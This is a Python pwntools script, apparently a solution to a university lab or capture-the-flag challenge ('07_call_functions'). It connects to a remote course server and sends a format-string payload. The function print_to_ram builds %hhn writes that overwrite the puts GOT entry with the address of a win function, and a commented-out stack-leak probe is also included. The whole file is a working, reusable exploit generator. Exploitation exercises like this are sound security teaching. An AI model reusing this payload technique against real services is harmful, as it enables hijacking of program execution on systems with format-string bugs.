from pwn import remote, process, p32, ELF

# Does not deal with \0s in any pointers needed
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
	addrs: bytes = b""
	writes: bytes = b""
	cum_chars: int = 4 * len(data)

	for offset in range(len(data)):
		addr = base + offset
		addrs += p32(addr)
		arg_n = arg_base + offset
		n = data[offset] - (cum_chars % 256)
		if n < 8: n += 256
		print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
		write = f"%{n}x%{arg_n}$hhn"
		print(write)
		writes += write.encode('utf-8')
		cum_chars += n

	pl = addrs + writes
	if b"\0" in pl: raise Exception("Payload requires a \\0")
	return pl

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25197

conn = remote(HOST, PORT)
#conn = process("07_call_functions")
#input()

elf = ELF("07_call_functions")
got_puts = elf.got['puts']
win = elf.sym['win']
pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
print(f"Payload: ({len(pl)})", pl, "\n\n")

#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)
while conn.connected():
	print(chr(conn.recv(1)[0]), end="", flush=True)